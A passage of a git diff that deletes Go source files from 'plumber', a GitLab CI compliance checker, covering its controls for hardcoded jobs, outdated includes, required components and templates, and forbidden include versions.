- Skipped: false,
- }
-
- // Check if control is enabled
- if !p.Enabled {
- l.Info("Hardcoded jobs control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- // If CI is invalid or missing, return early
- if !pipelineOriginData.CiValid || pipelineOriginData.CiMissing {
- result.Compliance = 0.0
- if !pipelineOriginData.CiValid {
- result.Metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- result.Metrics.CiMissing = 1
- }
- return result
- }
-
- // Loop over all jobs to check for hardcoded ones
- for jobName, isHardcoded := range pipelineOriginData.JobHardcodedMap {
- if isHardcoded {
- l.WithField("jobName", jobName).Debug("Found hardcoded job")
-
- issue := GitlabPipelineHardcodedJobIssue{
- Code: CodeJobHardcoded,
- DocURL: CodeJobHardcoded.DocURL(),
- JobName: jobName,
- }
- result.Issues = append(result.Issues, issue)
- result.Metrics.HardcodedJobs++
- }
- }
-
- // Calculate compliance based on issues
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Debug("Found hardcoded jobs, setting compliance to 0")
- }
-
- // Set metrics
- result.Metrics.Total = uint(len(pipelineOriginData.JobMap))
-
- l.WithFields(logrus.Fields{
- "totalJobs": result.Metrics.Total,
- "hardcodedJobsCount": result.Metrics.HardcodedJobs,
- "compliance": result.Compliance,
- }).Info("Hardcoded jobs control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineOriginOutdated.go b/control/controlGitlabPipelineOriginOutdated.go
deleted file mode 100644
index b8534fc..0000000
--- a/control/controlGitlabPipelineOriginOutdated.go
+++ /dev/null
@@ -1,227 +0,0 @@
-package control
-
-import (
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginOutdatedVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineIncludesOutdatedConf holds the configuration for outdated includes detection
-// No specific configuration needed for outdated detection
-// The logic uses the UpToDate field from the analysis data
-type GitlabPipelineIncludesOutdatedConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineIncludesOutdatedConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- outdatedConfig := plumberConfig.GetIncludesMustBeUpToDateConfig()
- if outdatedConfig == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = outdatedConfig.IsEnabled()
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- }).Debug("includesMustBeUpToDate control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineIncludesOutdatedMetrics holds metrics about outdated includes
-type GitlabPipelineIncludesOutdatedMetrics struct {
- Total uint `json:"total"`
- OriginOutdated uint `json:"originOutdated"`
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineIncludesOutdatedResult holds the result of the outdated control
-type GitlabPipelineIncludesOutdatedResult struct {
- Issues []GitlabPipelineIncludesOutdatedIssue `json:"issues"`
- Metrics GitlabPipelineIncludesOutdatedMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineIncludesOutdatedIssue represents an issue with an outdated include
-// Issue data for outdated origin - PolicyIssueTypeId = [10]
-type GitlabPipelineIncludesOutdatedIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Version string `json:"version"`
- LatestVersion string `json:"latestVersion"`
- PlumberOriginPath string `json:"plumberOriginPath,omitempty"`
- GitlabIncludeLocation string `json:"gitlabIncludeLocation"`
- GitlabIncludeType string `json:"gitlabIncludeType"`
- GitlabIncludeProject string `json:"gitlabIncludeProject,omitempty"`
- Nested bool `json:"nested"`
- ComponentName string `json:"componentName,omitempty"`
- PlumberTemplateName string `json:"plumberTemplateName,omitempty"`
- OriginHash uint64 `json:"originHash"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the outdated includes detection control
-func (p *GitlabPipelineIncludesOutdatedConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineIncludesOutdatedResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineIncludesOutdated",
- "controlVersion": ControlTypeGitlabPipelineOriginOutdatedVersion,
- })
- l.Info("Start outdated includes control")
-
- result := &GitlabPipelineIncludesOutdatedResult{
- Issues: []GitlabPipelineIncludesOutdatedIssue{},
- Metrics: GitlabPipelineIncludesOutdatedMetrics{},
- Compliance: 0.0, // Start with 0%, will be set to 100 if no outdated origins found
- Version: ControlTypeGitlabPipelineOriginOutdatedVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Outdated includes control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineIncludesOutdatedMetrics{}
-
- // Count CI status (max 1 as it's only one asset)
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- //////////////////////////////////
- // Check for outdated origins //
- //////////////////////////////////
-
- // Check all origins for outdated versions
- for _, origin := range pipelineOriginData.Origins {
-
- // Skip hardcoded origins - they are not "includes"
- if origin.OriginType == "hardcoded" {
- continue
- }
-
- // Count all non-hardcoded origins as includes
- metrics.Total++
-
- lOrigin := l.WithFields(logrus.Fields{
- "originType": origin.OriginType,
- "version": origin.Version,
- "location": origin.GitlabIncludeOrigin.Location,
- "upToDate": origin.UpToDate,
- "fromPlumber": origin.FromPlumber,
- "fromGitlabCatalog": origin.FromGitlabCatalog,
- })
- lOrigin.Debug("Checking origin for outdated version")
-
- // Check if origin is outdated (only for Plumber or GitLab catalog origins)
- if (origin.FromPlumber || origin.FromGitlabCatalog) && !origin.UpToDate {
-
- // Determine the appropriate latest version based on origin type
- latestVersion := ""
- plumberOriginPath := ""
- plumberTemplateName := ""
-
- if origin.FromPlumber {
- latestVersion = origin.PlumberOrigin.LatestVersion
- plumberOriginPath = origin.PlumberOrigin.Path
- plumberTemplateName = origin.PlumberOrigin.Path
- } else if origin.FromGitlabCatalog {
- latestVersion = origin.GitlabComponent.ComponentLatestVersion
- }
-
- // Extract template name from the path (just the last part after the last "/")
- templateName := plumberTemplateName
- if plumberTemplateName != "" && strings.Contains(plumberTemplateName, "/") {
- templateName = plumberTemplateName[strings.LastIndex(plumberTemplateName, "/")+1:]
- }
-
- // Extract component name from gitlabIncludeLocation if it's a component and componentName is empty
- componentName := origin.GitlabComponent.ComponentName
- if origin.GitlabIncludeOrigin.Type == "component" && componentName == "" && origin.GitlabIncludeOrigin.Location != "" {
- if strings.Contains(origin.GitlabIncludeOrigin.Location, "/") {
- componentName = origin.GitlabIncludeOrigin.Location[strings.LastIndex(origin.GitlabIncludeOrigin.Location, "/")+1:]
- }
- }
-
- // Create issue for outdated origin
- issue := GitlabPipelineIncludesOutdatedIssue{
- Code: CodeIncludeOutdated,
- DocURL: CodeIncludeOutdated.DocURL(),
- Version: origin.Version,
- LatestVersion: latestVersion,
- PlumberOriginPath: plumberOriginPath,
- GitlabIncludeLocation: origin.GitlabIncludeOrigin.Location,
- GitlabIncludeType: origin.GitlabIncludeOrigin.Type,
- GitlabIncludeProject: origin.GitlabIncludeOrigin.Project,
- Nested: origin.Nested,
- ComponentName: componentName,
- PlumberTemplateName: templateName,
- OriginHash: origin.OriginHash,
- }
-
- result.Issues = append(result.Issues, issue)
- metrics.OriginOutdated++
-
- lOrigin.Info("Outdated origin detected")
- }
- }
-
- // Set compliance: 100% if no outdated origins found, 0% otherwise
- if len(result.Issues) == 0 {
- result.Compliance = 100.0
- } else {
- result.Compliance = 0.0
- }
-
- // Update result with final metrics
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalOrigins": metrics.Total,
- "outdatedOrigins": metrics.OriginOutdated,
- "compliance": result.Compliance,
- }).Info("Outdated includes control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineOriginRequiredComponents.go b/control/controlGitlabPipelineOriginRequiredComponents.go
deleted file mode 100644
index cdef6a1..0000000
--- a/control/controlGitlabPipelineOriginRequiredComponents.go
+++ /dev/null
@@ -1,296 +0,0 @@
-package control
-
-import (
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/utils"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginRequiredComponentsVersion = "0.2.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineRequiredComponentsConf holds the configuration for required components check
-type GitlabPipelineRequiredComponentsConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
- // DNF (Disjunctive Normal Form) format:
- // Outer array = OR (at least one group must be satisfied)
- // Inner array = AND (all components in group must be present)
- // Example: [["comp-a", "comp-b"], ["comp-c"]] means:
- // "must have (comp-a AND comp-b) OR (comp-c)"
- RequiredGroups [][]string `json:"requiredGroups"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineRequiredComponentsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- config := plumberConfig.GetPipelineMustIncludeComponentConfig()
- if config == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = config.IsEnabled()
-
- // Resolve required groups from either 'required' expression or legacy 'requiredGroups'
- groups, err := config.GetResolvedRequiredGroups()
- if err != nil {
- return err
- }
- p.RequiredGroups = groups
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "requiredGroups": p.RequiredGroups,
- "hasExpression": config.Required != "",
- }).Debug("pipelineMustIncludeComponent control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// ComponentGroupStatus tracks the status of a single requirement group (AND clause)
-type ComponentGroupStatus struct {
- GroupIndex int `json:"groupIndex"` // Which requirement group (0-based)
- RequiredOrigins []string `json:"requiredOrigins"` // Components required in this group
- FoundOrigins []string `json:"foundOrigins"` // Components found and not overridden
- MissingOrigins []string `json:"missingOrigins"` // Components missing from this group
- OverriddenOrigins []string `json:"overriddenOrigins"` // Components found but overridden with forbidden keywords
- IsFullySatisfied bool `json:"isFullySatisfied"` // All components in group present (not missing)
-}
-
-// GitlabPipelineRequiredComponentsMetrics holds metrics about required components
-type GitlabPipelineRequiredComponentsMetrics struct {
- TotalGroups uint `json:"totalGroups"` // Total number of requirement groups
- SatisfiedGroups uint `json:"satisfiedGroups"` // Number of fully satisfied groups
- AnySatisfiedGroup bool `json:"anySatisfiedGroup"` // True if at least one group satisfied
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineRequiredComponentsResult holds the result of the required components control
-type GitlabPipelineRequiredComponentsResult struct {
- RequirementGroups []ComponentGroupStatus `json:"requirementGroups"`
- Issues []RequiredComponentIssue `json:"issues"`
- OverriddenIssues []RequiredComponentOverriddenIssue `json:"overriddenIssues"`
- Metrics GitlabPipelineRequiredComponentsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// RequiredComponentIssue represents an issue with a missing required component
-type RequiredComponentIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- ComponentPath string `json:"componentPath"`
- GroupIndex int `json:"groupIndex"`
-}
-
-// RequiredComponentOverriddenIssue represents an issue where a required component
-// is imported but its jobs are overridden with forbidden keywords
-type RequiredComponentOverriddenIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- ComponentPath string `json:"componentPath"`
- GroupIndex int `json:"groupIndex"`
- OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the required components control
-func (p *GitlabPipelineRequiredComponentsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData, gitlabURL string) *GitlabPipelineRequiredComponentsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineRequiredComponents",
- "controlVersion": ControlTypeGitlabPipelineOriginRequiredComponentsVersion,
- })
- l.Info("Start required components control")
-
- result := &GitlabPipelineRequiredComponentsResult{
- RequirementGroups: []ComponentGroupStatus{},
- Issues: []RequiredComponentIssue{},
- OverriddenIssues: []RequiredComponentOverriddenIssue{},
- Metrics: GitlabPipelineRequiredComponentsMetrics{},
- Compliance: 0.0,
- Version: ControlTypeGitlabPipelineOriginRequiredComponentsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Required components control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineRequiredComponentsMetrics{}
-
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- // Initialize requirement groups
- result.RequirementGroups = make([]ComponentGroupStatus, len(p.RequiredGroups))
- for i, group := range p.RequiredGroups {
- result.RequirementGroups[i] = ComponentGroupStatus{
- GroupIndex: i,
- RequiredOrigins: group,
- FoundOrigins: []string{},
- MissingOrigins: make([]string, len(group)),
- OverriddenOrigins: []string{},
- IsFullySatisfied: false,
- }
- // Initialize all as missing
- copy(result.RequirementGroups[i].MissingOrigins, group)
- }
-
- // Check all origins against all requirement groups
- for idx := range pipelineOriginData.Origins {
- origin := &pipelineOriginData.Origins[idx]
-
- if origin.OriginType != "component" {
- continue
- }
-
- cleanComponentPath := utils.CleanOriginPath(origin.GitlabIncludeOrigin.Location)
-
- for groupIdx := range result.RequirementGroups {
- group := &result.RequirementGroups[groupIdx]
-
- for _, requiredOrigin := range group.RequiredOrigins {
- cleanRequired := utils.CleanOriginPath(requiredOrigin)
-
- if cleanComponentPath == cleanRequired {
- overriddenJobs := getOriginOverriddenJobs(origin, pipelineOriginData)
-
- if len(overriddenJobs) > 0 {
- group.OverriddenOrigins = append(group.OverriddenOrigins, requiredOrigin)
- result.OverriddenIssues = append(result.OverriddenIssues, RequiredComponentOverriddenIssue{ Code: CodeComponentOverridden,
- DocURL: CodeComponentOverridden.DocURL(), ComponentPath: requiredOrigin,
- GroupIndex: groupIdx,
- OverriddenJobs: overriddenJobs,
- })
- } else {
- group.FoundOrigins = append(group.FoundOrigins, requiredOrigin)
- }
-
- // Remove from missing list regardless of override status
- removeMissingComponent(group, requiredOrigin)
-
- l.WithFields(logrus.Fields{
- "component": requiredOrigin,
- "groupIndex": groupIdx,
- "overriddenJobs": overriddenJobs,
- }).Debug("Required component matched")
-
- break
- }
- }
- }
- }
-
- // Evaluate groups, populate issues
- anySatisfied := false
- for i := range result.RequirementGroups {
- group := &result.RequirementGroups[i]
-
- // Group is fully satisfied if no components are missing.
- // Overridden components are still "present" (imported) β they produce separate issues.
- group.IsFullySatisfied = len(group.MissingOrigins) == 0
-
- if group.IsFullySatisfied {
- anySatisfied = true
- metrics.SatisfiedGroups++
- }
-
- // Create issues for missing components
- for _, missing := range group.MissingOrigins {
- result.Issues = append(result.Issues, RequiredComponentIssue{
- Code: CodeComponentMissing,
- DocURL: CodeComponentMissing.DocURL(),
- ComponentPath: missing,
- GroupIndex: i,
- })
- }
- // Note: overridden issues are created inline during origin matching
- // so we can capture the specific forbidden keys per component
- }
-
- // Calculate metrics
- metrics.TotalGroups = uint(len(p.RequiredGroups))
- metrics.AnySatisfiedGroup = anySatisfied
-
- // Calculate compliance using DNF logic
- // Found = 100%, Overridden = 50%, Missing = 0%
- if len(p.RequiredGroups) == 0 {
- result.Compliance = 100.0
- } else {
- maxScore := 0.0
- for _, group := range result.RequirementGroups {
- totalRequired := len(group.RequiredOrigins)
- if totalRequired == 0 {
- continue
- }
-
- found := len(group.FoundOrigins)
- overridden := len(group.OverriddenOrigins)
-
- score := (float64(found) + float64(overridden)*0.5) / float64(totalRequired)
- if score > maxScore {
- maxScore = score
- }
- }
- result.Compliance = maxScore * 100.0
- }
-
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalGroups": metrics.TotalGroups,
- "satisfiedGroups": metrics.SatisfiedGroups,
- "compliance": result.Compliance,
- "missingIssues": len(result.Issues),
- "overriddenIssues": len(result.OverriddenIssues),
- }).Info("Required components control completed")
-
- return result
-}
-
-// removeMissingComponent removes a component from the missing list by path
-func removeMissingComponent(group *ComponentGroupStatus, componentPath string) {
- cleanTarget := utils.CleanOriginPath(componentPath)
- for i := 0; i < len(group.MissingOrigins); i++ {
- cleanMissing := utils.CleanOriginPath(group.MissingOrigins[i])
- if cleanMissing == cleanTarget {
- group.MissingOrigins = append(group.MissingOrigins[:i], group.MissingOrigins[i+1:]...)
- return
- }
- }
-}
diff --git a/control/controlGitlabPipelineOriginRequiredTemplates.go b/control/controlGitlabPipelineOriginRequiredTemplates.go
deleted file mode 100644
index aaea504..0000000
--- a/control/controlGitlabPipelineOriginRequiredTemplates.go
+++ /dev/null
@@ -1,338 +0,0 @@
-package control
-
-import (
- "path"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/utils"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginRequiredTemplatesVersion = "0.2.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineRequiredTemplatesConf holds the configuration for required templates check
-type GitlabPipelineRequiredTemplatesConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
- // DNF (Disjunctive Normal Form) format:
- // Outer array = OR (at least one group must be satisfied)
- // Inner array = AND (all templates in group must be present)
- // Example: [["go", "helm"], ["go_helm_unified"]] means:
- // "must have (go AND helm) OR (go_helm_unified)"
- RequiredGroups [][]string `json:"requiredGroups"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineRequiredTemplatesConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- config := plumberConfig.GetPipelineMustIncludeTemplateConfig()
- if config == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = config.IsEnabled()
-
- // Resolve required groups from either 'required' expression or legacy 'requiredGroups'
- groups, err := config.GetResolvedRequiredGroups()
- if err != nil {
- return err
- }
- p.RequiredGroups = groups
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "requiredGroups": p.RequiredGroups,
- "hasExpression": config.Required != "",
- }).Debug("pipelineMustIncludeTemplate control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// TemplateGroupStatus tracks the status of a single requirement group (AND clause)
-type TemplateGroupStatus struct {
- GroupIndex int `json:"groupIndex"` // Which requirement group (0-based)
- RequiredOrigins []string `json:"requiredOrigins"` // Templates required in this group
- FoundOrigins []string `json:"foundOrigins"` // Templates found and not overridden
- MissingOrigins []string `json:"missingOrigins"` // Templates missing from this group
- OverriddenOrigins []string `json:"overriddenOrigins"` // Templates found but overridden with forbidden keywords
- IsFullySatisfied bool `json:"isFullySatisfied"` // All templates in group present (not missing)
-}
-
-// GitlabPipelineRequiredTemplatesMetrics holds metrics about required templates
-type GitlabPipelineRequiredTemplatesMetrics struct {
- TotalGroups uint `json:"totalGroups"` // Total number of requirement groups
- SatisfiedGroups uint `json:"satisfiedGroups"` // Number of fully satisfied groups
- AnySatisfiedGroup bool `json:"anySatisfiedGroup"` // True if at least one group satisfied
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineRequiredTemplatesResult holds the result of the required templates control
-type GitlabPipelineRequiredTemplatesResult struct {
- RequirementGroups []TemplateGroupStatus `json:"requirementGroups"`
- Issues []RequiredTemplateIssue `json:"issues"`
- OverriddenIssues []RequiredTemplateOverriddenIssue `json:"overriddenIssues"`
- Metrics GitlabPipelineRequiredTemplatesMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// RequiredTemplateIssue represents an issue with a missing required template
-type RequiredTemplateIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- TemplatePath string `json:"templatePath"`
- GroupIndex int `json:"groupIndex"`
-}
-
-// RequiredTemplateOverriddenIssue represents an issue where a required template
-// is imported but its jobs are overridden with forbidden keywords
-type RequiredTemplateOverriddenIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- TemplatePath string `json:"templatePath"`
- GroupIndex int `json:"groupIndex"`
- OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// pathsMatch checks if two paths match (direct or normalized)
-func pathsMatch(path1, path2 string) bool {
- if path1 == path2 {
- return true
- }
- return path.Clean(path1) == path.Clean(path2)
-}
-
-
-// templateMatchesRequired checks if a found template path matches a required template path
-func templateMatchesRequired(foundPath, requiredPath string) bool {
- if pathsMatch(foundPath, requiredPath) {
- return true
- }
- if strings.HasSuffix(foundPath, "/"+requiredPath) || strings.HasSuffix(foundPath, requiredPath) {
- return true
- }
- return false
-}
-
-// Run executes the required templates control
-func (p *GitlabPipelineRequiredTemplatesConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineRequiredTemplatesResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineRequiredTemplates",
- "controlVersion": ControlTypeGitlabPipelineOriginRequiredTemplatesVersion,
- })
- l.Info("Start required templates control")
-
- result := &GitlabPipelineRequiredTemplatesResult{
- RequirementGroups: []TemplateGroupStatus{},
- Issues: []RequiredTemplateIssue{},
- OverriddenIssues: []RequiredTemplateOverriddenIssue{},
- Metrics: GitlabPipelineRequiredTemplatesMetrics{},
- Compliance: 0.0,
- Version: ControlTypeGitlabPipelineOriginRequiredTemplatesVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Required templates control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineRequiredTemplatesMetrics{}
-
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- // Initialize requirement groups
- result.RequirementGroups = make([]TemplateGroupStatus, len(p.RequiredGroups))
- for i, group := range p.RequiredGroups {
- result.RequirementGroups[i] = TemplateGroupStatus{
- GroupIndex: i,
- RequiredOrigins: group,
- FoundOrigins: []string{},
- MissingOrigins: make([]string, len(group)),
- OverriddenOrigins: []string{},
- IsFullySatisfied: false,
- }
- // Initialize all as missing
- copy(result.RequirementGroups[i].MissingOrigins, group)
- }
-
- // Check all origins against all requirement groups
- for idx := range pipelineOriginData.Origins {
- origin := &pipelineOriginData.Origins[idx]
-
- // Skip hardcoded origins
- if origin.OriginType == originHardcoded {
- continue
- }
-
- // Determine the template path from the origin
- var templatePaths []string
- if origin.FromPlumber && origin.PlumberOrigin.Path != "" {
- templatePaths = append(templatePaths, origin.PlumberOrigin.Path)
- }
- if origin.OriginType == "project" && origin.GitlabIncludeOrigin.Location != "" {
- templatePath := origin.GitlabIncludeOrigin.Location
- templatePath = strings.TrimSuffix(templatePath, ".yml")
- templatePath = strings.TrimSuffix(templatePath, ".yaml")
- templatePaths = append(templatePaths, templatePath)
- }
-
- if len(templatePaths) == 0 {
- continue
- }
-
- for groupIdx := range result.RequirementGroups {
- group := &result.RequirementGroups[groupIdx]
-
- for _, requiredOrigin := range group.RequiredOrigins {
- matched := false
- for _, foundPath := range templatePaths {
- if templateMatchesRequired(foundPath, requiredOrigin) {
- matched = true
- break
- }
- }
-
- if matched {
- overriddenJobs := getOriginOverriddenJobs(origin, pipelineOriginData)
-
- if len(overriddenJobs) > 0 {
- group.OverriddenOrigins = append(group.OverriddenOrigins, requiredOrigin)
- result.OverriddenIssues = append(result.OverriddenIssues, RequiredTemplateOverriddenIssue{ Code: CodeTemplateOverridden,
- DocURL: CodeTemplateOverridden.DocURL(), TemplatePath: requiredOrigin,
- GroupIndex: groupIdx,
- OverriddenJobs: overriddenJobs,
- })
- } else {
- group.FoundOrigins = append(group.FoundOrigins, requiredOrigin)
- }
-
- // Remove from missing list regardless of override status
- removeMissingTemplate(group, requiredOrigin)
-
- l.WithFields(logrus.Fields{
- "template": requiredOrigin,
- "groupIndex": groupIdx,
- "overriddenJobs": overriddenJobs,
- }).Debug("Required template matched")
-
- break
- }
- }
- }
- }
-
- // Evaluate groups, populate issues
- anySatisfied := false
- for i := range result.RequirementGroups {
- group := &result.RequirementGroups[i]
-
- // Group is fully satisfied if no templates are missing.
- // Overridden templates are still "present" (imported) β they produce separate issues.
- group.IsFullySatisfied = len(group.MissingOrigins) == 0
-
- if group.IsFullySatisfied {
- anySatisfied = true
- metrics.SatisfiedGroups++
- }
-
- // Create issues for missing templates
- for _, missing := range group.MissingOrigins {
- result.Issues = append(result.Issues, RequiredTemplateIssue{
- Code: CodeTemplateMissing,
- DocURL: CodeTemplateMissing.DocURL(),
- TemplatePath: missing,
- GroupIndex: i,
- })
- }
- // Note: overridden issues are created inline during origin matching
- // so we can capture the specific forbidden keys per template
- }
-
- // Calculate metrics
- metrics.TotalGroups = uint(len(p.RequiredGroups))
- metrics.AnySatisfiedGroup = anySatisfied
-
- // Calculate compliance using DNF logic
- // Found = 100%, Overridden = 50%, Missing = 0%
- if len(p.RequiredGroups) == 0 {
- result.Compliance = 100.0
- } else {
- maxScore := 0.0
- for _, group := range result.RequirementGroups {
- totalRequired := len(group.RequiredOrigins)
- if totalRequired == 0 {
- continue
- }
-
- found := len(group.FoundOrigins)
- overridden := len(group.OverriddenOrigins)
-
- score := (float64(found) + float64(overridden)*0.5) / float64(totalRequired)
- if score > maxScore {
- maxScore = score
- }
- }
- result.Compliance = maxScore * 100.0
- }
-
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalGroups": metrics.TotalGroups,
- "satisfiedGroups": metrics.SatisfiedGroups,
- "compliance": result.Compliance,
- "missingIssues": len(result.Issues),
- "overriddenIssues": len(result.OverriddenIssues),
- }).Info("Required templates control completed")
-
- return result
-}
-
-// removeMissingTemplate removes a template from the missing list by path
-func removeMissingTemplate(group *TemplateGroupStatus, templatePath string) {
- for i := 0; i < len(group.MissingOrigins); i++ {
- if pathsMatch(group.MissingOrigins[i], templatePath) {
- group.MissingOrigins = append(group.MissingOrigins[:i], group.MissingOrigins[i+1:]...)
- return
- }
- }
-}
diff --git a/control/controlGitlabPipelineOriginVersion.go b/control/controlGitlabPipelineOriginVersion.go
deleted file mode 100644
index d465bef..0000000
--- a/control/controlGitlabPipelineOriginVersion.go
+++ /dev/null
@@ -1,252 +0,0 @@
-package control
-
-import (
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginVersionVersion = "0.1.0"
-
-// originHardcoded is the constant for hardcoded origin type
-const originHardcoded = "hardcoded"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineIncludesForbiddenVersionConf holds the configuration for forbidden version detection
-type GitlabPipelineIncludesForbiddenVersionConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenVersions is a list of version patterns considered forbidden (e.g., latest, main, HEAD)
- ForbiddenVersions []string `json:"forbiddenVersions"`
-
- // DefaultBranchIsForbiddenVersion when true, adds the project's default branch to forbidden versions
- DefaultBranchIsForbiddenVersion bool `json:"defaultBranchIsForbiddenVersion"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineIncludesForbiddenVersionConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- versionConfig := plumberConfig.GetIncludesMustNotUseForbiddenVersionsConfig()
- if versionConfig == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = versionConfig.IsEnabled()
- p.ForbiddenVersions = versionConfig.ForbiddenVersions
- if versionConfig.DefaultBranchIsForbiddenVersion != nil {
- p.DefaultBranchIsForbiddenVersion = *versionConfig.DefaultBranchIsForbiddenVersion
- }
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenVersions": p.ForbiddenVersions,
- "defaultBranchIsForbiddenVersion": p.DefaultBranchIsForbiddenVersion,
- }).Debug("includesMustNotUseForbiddenVersions control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
